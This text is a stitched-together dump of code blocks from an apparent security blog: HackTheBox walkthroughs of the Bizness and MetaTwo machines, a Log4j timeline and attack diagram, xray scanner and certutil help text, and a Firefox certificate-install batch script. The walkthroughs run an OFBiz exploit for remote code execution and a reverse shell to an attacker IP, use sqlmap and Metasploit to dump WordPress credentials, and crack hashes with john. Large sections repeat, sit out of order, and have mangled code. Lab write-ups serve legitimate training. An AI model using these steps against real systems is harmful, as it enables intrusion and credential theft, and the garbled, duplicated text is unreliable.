Incident Timeline
+ timeline
+ title Log4j Vulnerability Incident Timeline
+ November 24, 2021 : Alibaba researchers discovered Log4Shell and reported it to Apache
+ December 10, 2021 : Apache disclosed the Log4j vulnerability (CVSS score 10.0)
+ December 13, 2021 : Bitdefender reported attempts to exploit Log4j for Khonsari ransomware
+ December 22, 2021 : U.S. CISA, FBI, NSA, and Five Eyes Alliance issued a joint security alert
+ December 23, 2021 : Belgium Ministry of Defense confirmed Log4j attack
+ December 2021 : Apache released 4 patches to fully fix the Log4j vulnerability
+
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# nmap -p- $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 20:43 AEST Nmap scan report for bizness.htb (10.129.232.1) Host is up (0.040s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https 41845/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 12.65 seconds
+
+
1
echo"10.129.232.1 bizness.htb" | sudo tee -a /etc/hosts
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# update-alternatives --config java There are 3 choices for the alternative java (providing /usr/bin/java).
Press <enter> to keep the current choice[*], or type selection number: 1 update-alternatives: using /usr/lib/jvm/java-11-openjdk-arm64/bin/java to provide /usr/bin/java (java) in manual mode ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# java --version openjdk 11.0.20-ea 2023-07-18 OpenJDK Runtime Environment (build 11.0.20-ea+7-post-Debian-1) OpenJDK 64-Bit Server VM (build 11.0.20-ea+7-post-Debian-1, mixed mode)
+
+
+
+
开启tcpdump
+
1
sudo tcpdump -i 2 icmp
+
+
运行POC
+
1 2 3
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# python3 exploit.py https://bizness.htb rce "ping -c 5 10.10.14.8" Not Sure Worked or not
+
+
查看抓到的数据包:
+
1 2 3 4 5 6 7 8
┌──(root@kali)-[/home/h4m5t/Desktop] └─# tcpdump -i 2 icmp tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes 21:47:38.693694 tun0 In IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 1, length 64 21:47:38.693728 tun0 Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 1, length 64 21:47:39.695235 tun0 In IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 2, length 64 21:47:39.695274 tun0 Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 2, length 64
+
+
说明RCE成功,现在进行反向shell
+
首先开启nc监听,再运行exp
+
1
nc -nlvp 4444
+
+
1 2 3
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# python3 exploit.py https://bizness.htb shell 10.10.14.8:4444 Not Sure Worked or not
ofbiz@bizness:/opt/ofbiz/framework/security/config$ cat security.properties | grep hash <ecurity/config$ cat security.properties | grep hash # -- specify the type of hash to use for one-way encryption, will be passed to java.security.MessageDigest.getInstance() -- password.encrypt.hash.type=SHA
cat HashCrypt.java /******************************************************************************* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. *******************************************************************************/ package org.apache.ofbiz.base.crypto;
privatestaticbooleandoCompareTypePrefix(String crypted, String defaultCrypt, byte[] bytes) { inttypeEnd= crypted.indexOf("}"); StringhashType= crypted.substring(1, typeEnd); Stringhashed= crypted.substring(typeEnd + 1); MessageDigestmessagedigest= getMessageDigest(hashType); messagedigest.update(bytes); byte[] digestBytes = messagedigest.digest(); char[] digestChars = Hex.encodeHex(digestBytes); StringcheckCrypted=newString(digestChars); if (hashed.equals(checkCrypted)) { returntrue; } // This next block should be removed when all {prefix}oldFunnyHex are fixed. if (hashed.equals(oldFunnyHex(digestBytes))) { Debug.logWarning("Warning: detected oldFunnyHex password prefixed with a hashType; this is not valid, please update the value in the database with ({%s}%s)", module, hashType, checkCrypted); returntrue; } returnfalse; }
/* * @deprecated use cryptBytes(hashType, salt, password); eventually, use * cryptUTF8(hashType, salt, password) after all existing installs are * salt-based. If the call-site of cryptPassword is just used to create a *new* * value, then you can switch to cryptUTF8 directly. */ @Deprecated publicstatic String cryptPassword(String hashType, String salt, String password) { if (hashType.startsWith("PBKDF2")) { return password != null ? pbkdf2HashCrypt(hashType, salt, password) : null; } return password != null ? cryptBytes(hashType, salt, password.getBytes(UtilIO.getUtf8())) : null; }
messagedigest.update(strBytes); return oldFunnyHex(messagedigest.digest()); } catch (Exception e) { Debug.logError(e, "Error while computing hash of type " + hashType, module); } return str; }
// This next block should be removed when all {prefix}oldFunnyHex are fixed. privatestatic String oldFunnyHex(byte[] bytes) { intk=0; char[] digestChars = newchar[bytes.length * 2]; for (byte b : bytes) { inti1= b;
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Minimim salt length supported by kernel: 0 Maximum salt length supported by kernel: 256
ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits.
Tips: There are at least two exploitable vulnerabilities in HelpDeskZ 1.0.2. There’s an authenticated SQL injection that will allow you to read a SHA1 hash from the database and crack it, allowing for SSH access. There’s also an arbirtray file upload vulnerability that will allow you to upload a webshell and get execution that way. Either way, you end up with a shell as the same user.
Tips: There are at least two exploitable vulnerabilities in HelpDeskZ 1.0.2. There’s an authenticated SQL injection that will allow you to read a SHA1 hash from the database and crack it, allowing for SSH access. There’s also an arbirtray file upload vulnerability that will allow you to upload a webshell and get execution that way. Either way, you end up with a shell as the same user.
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# nmap -p- $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 20:43 AEST Nmap scan report for bizness.htb (10.129.232.1) Host is up (0.040s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https 41845/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 12.65 seconds
1
echo"10.129.232.1 bizness.htb" | sudo tee -a /etc/hosts
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# update-alternatives --config java There are 3 choices for the alternative java (providing /usr/bin/java).
Press <enter> to keep the current choice[*], or type selection number: 1 update-alternatives: using /usr/lib/jvm/java-11-openjdk-arm64/bin/java to provide /usr/bin/java (java) in manual mode ┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# java --version openjdk 11.0.20-ea 2023-07-18 OpenJDK Runtime Environment (build 11.0.20-ea+7-post-Debian-1) OpenJDK 64-Bit Server VM (build 11.0.20-ea+7-post-Debian-1, mixed mode)
开启tcpdump
1
sudo tcpdump -i 2 icmp
运行POC
1 2 3
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# python3 exploit.py https://bizness.htb rce "ping -c 5 10.10.14.8" Not Sure Worked or not
查看抓到的数据包:
1 2 3 4 5 6 7 8
┌──(root@kali)-[/home/h4m5t/Desktop] └─# tcpdump -i 2 icmp tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes 21:47:38.693694 tun0 In IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 1, length 64 21:47:38.693728 tun0 Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 1, length 64 21:47:39.695235 tun0 In IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 2, length 64 21:47:39.695274 tun0 Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 2, length 64
说明RCE成功,现在进行反向shell
首先开启nc监听,再运行exp
1
nc -nlvp 4444
1 2 3
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness] └─# python3 exploit.py https://bizness.htb shell 10.10.14.8:4444 Not Sure Worked or not
ofbiz@bizness:/opt/ofbiz/framework/security/config$ cat security.properties | grep hash <ecurity/config$ cat security.properties | grep hash # -- specify the type of hash to use for one-way encryption, will be passed to java.security.MessageDigest.getInstance() -- password.encrypt.hash.type=SHA
cat HashCrypt.java /******************************************************************************* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. *******************************************************************************/ package org.apache.ofbiz.base.crypto;
privatestaticbooleandoCompareTypePrefix(String crypted, String defaultCrypt, byte[] bytes) { inttypeEnd= crypted.indexOf("}"); StringhashType= crypted.substring(1, typeEnd); Stringhashed= crypted.substring(typeEnd + 1); MessageDigestmessagedigest= getMessageDigest(hashType); messagedigest.update(bytes); byte[] digestBytes = messagedigest.digest(); char[] digestChars = Hex.encodeHex(digestBytes); StringcheckCrypted=newString(digestChars); if (hashed.equals(checkCrypted)) { returntrue; } // This next block should be removed when all {prefix}oldFunnyHex are fixed. if (hashed.equals(oldFunnyHex(digestBytes))) { Debug.logWarning("Warning: detected oldFunnyHex password prefixed with a hashType; this is not valid, please update the value in the database with ({%s}%s)", module, hashType, checkCrypted); returntrue; } returnfalse; }
/* * @deprecated use cryptBytes(hashType, salt, password); eventually, use * cryptUTF8(hashType, salt, password) after all existing installs are * salt-based. If the call-site of cryptPassword is just used to create a *new* * value, then you can switch to cryptUTF8 directly. */ @Deprecated publicstatic String cryptPassword(String hashType, String salt, String password) { if (hashType.startsWith("PBKDF2")) { return password != null ? pbkdf2HashCrypt(hashType, salt, password) : null; } return password != null ? cryptBytes(hashType, salt, password.getBytes(UtilIO.getUtf8())) : null; }
messagedigest.update(strBytes); return oldFunnyHex(messagedigest.digest()); } catch (Exception e) { Debug.logError(e, "Error while computing hash of type " + hashType, module); } return str; }
// This next block should be removed when all {prefix}oldFunnyHex are fixed. privatestatic String oldFunnyHex(byte[] bytes) { intk=0; char[] digestChars = newchar[bytes.length * 2]; for (byte b : bytes) { inti1= b;
Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Minimim salt length supported by kernel: 0 Maximum salt length supported by kernel: 256
ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits.
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed.
graph LR A[Attacker crafts<br>malicious payload<br>with JNDI lookup] --> C{Log4j parses:<br>Contains JNDI lookup?} C -->|Yes| D[Execute<br>JNDI lookup] C -->|No| E[Normal log] D --> F[Connect to<br>attacker's server] F --> G[Download &<br>execute<br>malicious codes] G --> H[Attacker gains<br>server control]
Incident Timeline
timeline title Log4j Vulnerability Incident Timeline November 24, 2021 : Alibaba researchers discovered Log4Shell and reported it to Apache December 10, 2021 : Apache disclosed the Log4j vulnerability (CVSS score 10.0) December 13, 2021 : Bitdefender reported attempts to exploit Log4j for Khonsari ransomware December 22, 2021 : U.S. CISA, FBI, NSA, and Five Eyes Alliance issued a joint security alert December 23, 2021 : Belgium Ministry of Defense confirmed Log4j attack December 2021 : Apache released 4 patches to fully fix the Log4j vulnerability
┌──(root@kali)-[/home/h4m5t/Desktop/HTB] └─# nmap -sV $IP Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 14:53 AEST Stats: 0:02:29 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan Service scan Timing: About 66.67% done; ETC: 14:57 (0:01:15 remaining) Nmap scan report for 10.129.231.241 Host is up (0.0093s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp? 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) 80/tcp open http nginx 1.18.0 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 161.02 seconds
If we go to http://$IP, we are redirected to http://metapress.htb, so we need to add this domain in /etc/hosts
[15:30:38] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.0.24, Nginx 1.18.0 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [15:30:38] [INFO] fetching database names available databases [2]: [*] blog [*] information_schema
[15:30:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
[15:38:24] [INFO] table 'blog.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv' [15:38:24] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb'
# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/gather/wp_bookingpress_category_services_sqli 2022-02-28 normal Yes Wordpress BookingPress bookingpress_front_get_category_services SQLi
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_bookingpress_category_services_sqli
msf6 > use 0 msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set RHOST metapress.htb RHOST => metapress.htb msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > set TARGETURI /events/ TARGETURI => /events/ msf6 auxiliary(gather/wp_bookingpress_category_services_sqli) > run [*] Running module against 10.129.231.241
[*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. [*] Extracting credential information Wordpress User Credentials ==========================
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# john --wordlist=/usr/share/wordlists/rockyou.txt user.hash Created directory: /root/.john Using default input encoding: UTF-8 Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 ASIMD 4x2]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status partylikearockstar (manager)
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# ftp metapress.htb@$IP Connected to 10.129.231.241. 220 ProFTPD Server (Debian) [::ffff:10.129.231.241] 331 Password required for metapress.htb Password: 230 User metapress.htb logged in Remote system type is UNIX. Using binary mode to transfer files. ftp>
First let us generate the password hash from the private GPG key using gpg2john and save it into a file named key.hash 运行john时报错:
1
Crash recovery file is locked: /root/.john/john.rec
解决方法:
1
rm /root/.john/john.rec
开始爆破:
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/MetaTwo] └─# john -wordlist=/usr/share/wordlists/rockyou.txt key.hash Using default input encoding: UTF-8 Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64]) Cost 1 (s2k-count) is 65011712 for all loaded hashes Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 7 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status blink182 (Passpie) 1g 0:00:00:02 DONE (2024-09-15 17:48) 0.3937g/s 75.59p/s 75.59c/s 75.59C/s carolina..november Use the "--show" option to display all of the cracked passwords reliably Session completed.
COMMANDS: webscan, ws Run a webscan task servicescan, ss Run a service scan task subdomain, sd Run a subdomain task poclint, pl, lint lint yaml poc burp-gamma, btg Convert the export file of burp historical proxy records to POC format transform transform other script to gamma reverse Run a standalone reverse server convert convert results from json to html or from html to json genca GenerateToFile CA certificate and key upgrade check new version and upgrade self if any updates found version Show version info x A command that enables all plugins. You can customize new commands or modify the plugins enabled by a command in the configuration file. help, h Shows a list of commands or help for one command
GLOBAL OPTIONS: --config FILE Load configuration from FILE (default: "config.yaml") --log-level value Log level, choices are debug, info, warn, error, fatal --help, -h show help [INFO] 2023-09-21 17:36:22 [default:entry.go:226] Loading config file from config.yaml
OPTIONS: --list, -l list plugins --plugins value, --plugin value, --plug value specify the plugins to run, separated by ',' --poc value, -p value specify the poc to run, separated by ',' --level value specify the level of poc to run, separated by ',' --tags value specify the level of poc to run, separated by ','
--listen value use proxy resource collector, value is proxy addr, (example: 127.0.0.1:1111) --basic-crawler value, --basic value use a basic spider to crawl the target and scan the requests --browser-crawler value, --browser value use a browser spider to crawl the target and scan the requests --url-file value, --uf value read urls from a local file and scan these urls, one url per line --burp-file value, --bf value read requests from burpsuite exported file as targets --url value, -u value scan a **single** url --data value, -d value data string to be sent through POST (e.g. 'username=admin') --raw-request FILE, --rr FILE load http raw request from a FILE --force-ssl, --fs force usage of SSL/HTTPS for raw-request
--json-output FILE, --jo FILE output xray results to FILE in json format --html-output FILE, --ho FILE output xray result to FILE in HTML format --webhook-output value, --wo value post xray result to url in json format
[INFO] 2023-09-21 17:03:17 [default:entry.go:226] Loading config file from config.yaml
Enabled plugins: [phantasm]
[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:114] found local poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml [INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details) [INFO] 2023-09-21 17:03:18 [default:dispatcher.go:444] processing GET http://example.com/ [Vuln: phantasm] Target "http://example.com/" VulnType "poc-yaml-jumpserver-session-replay-unauth/default" Author "Chaitin" Links ["https://stack.chaitin.com/techblog/detail/156"]
[*] All pending requests have been scanned [*] scanned: 1, pending: 0, requestSent: 2, latency: 40.50ms, failedRatio: 0.00% [INFO] 2023-09-21 17:03:19 [controller:dispatcher.go:573] controller released, task done
C:\Users\h4m5t\Downloads\nss-3.11\nss-3.11\bin>certutil.exe -H -A Add a certificate to the database (create if needed) -E Add an Email certificate to the database (create if needed) -n cert-name Specify the nickname of the certificate to add -t trustargs Set the certificate trust attributes: p valid peer P trusted peer (implies p) c valid CA T trusted CA to issue client certs (implies c) C trusted CA to issue server certs (implies c) u user cert w send warning g make step-up cert -f pwfile Specify the password file -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -a The input certificate is encoded in ASCII (RFC1113) -i input Specify the certificate file (default is stdin)
-C Create a new binary certificate from a BINARY cert request -c issuer-name The nickname of the issuer cert -i cert-request The BINARY certificate request file -o output-cert Output binary cert to this file (default is stdout) -x Self sign -m serial-number Cert serial number -w warp-months Time Warp -v months-valid Months valid (default is 3) -f pwfile Specify the password file -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -1 Create key usage extension -2 Create basic constraint extension -3 Create authority key ID extension -4 Create crl distribution point extension -5 Create netscape cert type extension -6 Create extended key usage extension -7 Create an email subject alt name extension -8 Create an dns subject alt name extension
-G Generate a new key pair -h token-name Name of token in which to generate key (default is internal) -k key-type Type of key pair to generate ("dsa", "rsa" (default)) -g key-size Key size in bits, (min 512, max 2048, default 1024) -y exp Set the public exponent value (3, 17, 65537) (rsa only) -f password-file Specify the password file -z noisefile Specify the noise file to be used -q pqgfile read PQG value from pqgfile (dsa only) -d keydir Key database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-D Delete a certificate from the database -n cert-name The nickname of the cert to delete -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-U List all modules -d moddir Module database directory (default is '~/.netscape') -P dbprefix Cert & Key database prefix -X force the database to open R/W
-K List all keys -h token-name Name of token in which to look for keys (default is internal, use "all" to list keys on all tokens) -k key-type Type of key pair to list ("all", "dsa", "rsa" (default)) -f password-file Specify the password file -d keydir Key database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W
-L List all certs, or print out a single named cert -n cert-name Pretty print named cert (list all if unspecified) -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W -r For single cert, print binary DER encoding -a For single cert, print ASCII encoding (RFC1113)
-M Modify trust attributes of certificate -n cert-name The nickname of the cert to modify -t trustargs Set the certificate trust attributes (see -A above) -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-N Create a new certificate database -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix
-T Reset the Key database or token -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -h token-name Token to reset (default is internal)
-O Print the chain of a certificate -n cert-name The nickname of the cert to modify -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W
-R Generate a certificate request (stdout) -s subject Specify the subject name (using RFC1485) -o output-req Output the cert request to this file -k key-type Type of key pair to generate ("dsa", "rsa" (default)) -h token-name Name of token in which to generate key (default is internal) -g key-size Key size in bits, RSA keys only (min 512, max 2048, default 1024) -q pqgfile Name of file containing PQG parameters (dsa only) -f pwfile Specify the password file -d keydir Key database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -p phone Specify the contact phone number ("123-456-7890") -a Output the cert request in ASCII (RFC1113); default is binary
-V Validate a certificate -n cert-name The nickname of the cert to Validate -b time validity time ("YYMMDDHHMMSS[+HHMM|-HHMM|Z]") -e Check certificate signature -u certusage Specify certificate usage: C SSL Client V SSL Server S Email signer R Email Recipient -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -X force the database to open R/W
-S Make a certificate and add to database -n key-name Specify the nickname of the cert -s subject Specify the subject name (using RFC1485) -c issuer-name The nickname of the issuer cert -t trustargs Set the certificate trust attributes (see -A above) -k key-type Type of key pair to generate ("dsa", "rsa" (default)) -h token-name Name of token in which to generate key (default is internal) -g key-size Key size in bits, RSA keys only (min 512, max 2048, default 1024) -q pqgfile Name of file containing PQG parameters (dsa only) -x Self sign -m serial-number Cert serial number -w warp-months Time Warp -v months-valid Months valid (default is 3) -f pwfile Specify the password file -d certdir Cert database directory (default is ~/.netscape) -P dbprefix Cert & Key database prefix -p phone Specify the contact phone number ("123-456-7890") -1 Create key usage extension -2 Create basic constraint extension -3 Create authority key ID extension -4 Create crl distribution point extension -5 Create netscape cert type extension -6 Create extended key usage extension -7 Create an email subject alt name extension -8 Create an dns subject alt name extension
@echo off ::开启变量延迟扩展 setlocal EnableExtensions EnableDelayedExpansion
echo ###checking new_version### echo -------------------------- set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox" set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox" set regKey="CurrentVersion" set regValue=""
set Value1="checkversion"
rem 检查新版本注册表是否存在 reg query %regPath1% >nul 2>nul echo %errorlevel% echo !errorlevel! if %errorlevel%==0 ( echo new_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo new_version Registry key %regkey% does not exist. echo -------------------------- ::检查旧版本注册表路径是否存在 echo ###checking old_version### reg query %regPath2% >nul 2>nul if !errorlevel!==0 ( echo old_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo old_version Registry key %regkey% does not exist. set Value1=0.0.0 )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majorold: %Major% )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majornew: %Major%
rem 检查版本号 if %final_version% EQU 0 ( echo Program version is 0. Exiting script... exit /b 1 ) else if %Major% LSS 49 ( call :function1 ) else ( call :function2 )
rem 退出脚本 exit /b
:: :function1 echo Program version is less than 49. Executing function 1... rem 执行函数1的代码,在49版本以下,更新cert8.db证书库。
::显示db中的现有证书 set "db_path=%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\" set default_name="" ::判断证书数据库路径是否存在 IF EXIST %db_path% ( echo default_path exists rem 在这里添加需要执行的命令 set "count=0" for /d %%i in ("%db_path%\*") do ( set /a count+=1 set "folder=%%~nxi" ) ::判断是否只有*.default这一个文件夹 if !count! equ 1 ( set default_name=!folder! set "all_path=%db_path%!default_name!" ::显示default文件夹全路径 echo !all_path! ::显示更新前证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ::更新证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -A -n "SomeNametest" -t "u,u,u" -i "C:\firefoxinstallcert\TPLINKCA.cer" -d !all_path! ::显示更新后的证书库 C:\firefoxinstallcert\nss-3.11\bin\certutil.exe -L -d !all_path! ) else ( echo no or more ) ) ELSE ( echo no )
goto :eof
:function2 echo Program version is greater than or equal to 49. Executing function 2... rem 执行函数2的代码,在49版本以上的FireFox中启用security.enterprise_roots.enabled
set source_file_cfg=C:\firefoxinstallcert\ddwi.cfg set "dest_dir_cfg=C:\Program Files\Mozilla Firefox\" echo Moving %source_file_cfg% to %dest_dir_cfg%... if exist "%source_file_cfg%" ( if exist "%dest_dir_cfg%" ( copy "%source_file_cfg%" "%dest_dir_cfg%" ) else ( echo Directory %dest_dir_cfg% does not exist! Cannot move file. ) ) else ( echo Source file %source_file_cfg% does not exist! Cannot move file. )
set "dest_dir_cfg_x86=C:\Program Files (x86)\Mozilla Firefox\" echo Moving %source_file_cfg% to %dest_dir_cfg_x86%... if exist "%source_file_cfg%" ( if exist "%dest_dir_cfg_x86%" ( copy "%source_file_cfg%" "%dest_dir_cfg_x86%" ) else ( echo Directory does not exist! Cannot move file. ) ) else ( echo Source file %source_file_cfg% does not exist! Cannot move file. )
set source_file_js=C:\firefoxinstallcert\local-settings.js set "dest_dir_js=C:\Program Files\Mozilla Firefox\defaults\pref\" echo Moving %source_file_js% to %dest_dir_js%... if exist "%source_file_js%" ( if exist "%dest_dir_js%" ( copy "%source_file_js%" "%dest_dir_js%" ) else ( echo Directory does not exist! Cannot move file. ) ) else ( echo Source file %source_file_js% does not exist! Cannot move file. ) set "dest_dir_js_x86=C:\Program Files (x86)\Mozilla Firefox\defaults\pref\" echo Moving %source_file_js% to %dest_dir_js_x86%... if exist "%source_file_js%" ( if exist "%dest_dir_js_x86%" ( copy "%source_file_js%" "%dest_dir_js_x86%" ) else ( echo Directory does not exist! Cannot move file. ) ) else ( echo Source file %source_file_js% does not exist! Cannot move file. )
@echo off ::开启变量延迟扩展 setlocal EnableExtensions EnableDelayedExpansion
echo ###checking new_version### echo -------------------------- set regPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox" set regPath2="HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox" set regKey="CurrentVersion" set regValue=""
set Value1="checkversion"
rem 检查新版本注册表是否存在 reg query %regPath1% >nul 2>nul echo %errorlevel% echo !errorlevel! if %errorlevel%==0 ( echo new_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath1% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo new_version Registry key %regkey% does not exist. echo -------------------------- ::检查旧版本注册表路径是否存在 echo ###checking old_version### reg query %regPath2% >nul 2>nul if !errorlevel!==0 ( echo old_version Registry key %regkey% exists. for /f "tokens=2*" %%a in ('reg query %regPath2% /v %regKey% ^| findstr /i %regKey%') do ( if "%regValue%"=="" ( echo value not exists ) else ( set Value1=%%b ) ) ) else ( echo old_version Registry key %regkey% does not exist. set Value1=0.0.0 )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majorold: %Major% )
echo !Value1! echo %Value1%
set "Major=%Value1:.=" & set /A "Minor=Revision, Revision=Subrev, Subrev=%" echo Majornew: %Major%
rem 检查版本号 if %final_version% EQU 0 ( echo Program version is 0. Exiting script... exit /b 1 ) else if %Major% LSS 49 ( call :function1 ) else ( call :function2 )
rem 退出脚本 exit /b
:: :function1 echo Program version is less than 49. Executing function 1... rem 执行函数1的代码,在49版本以下,更新cert8.db证书库。
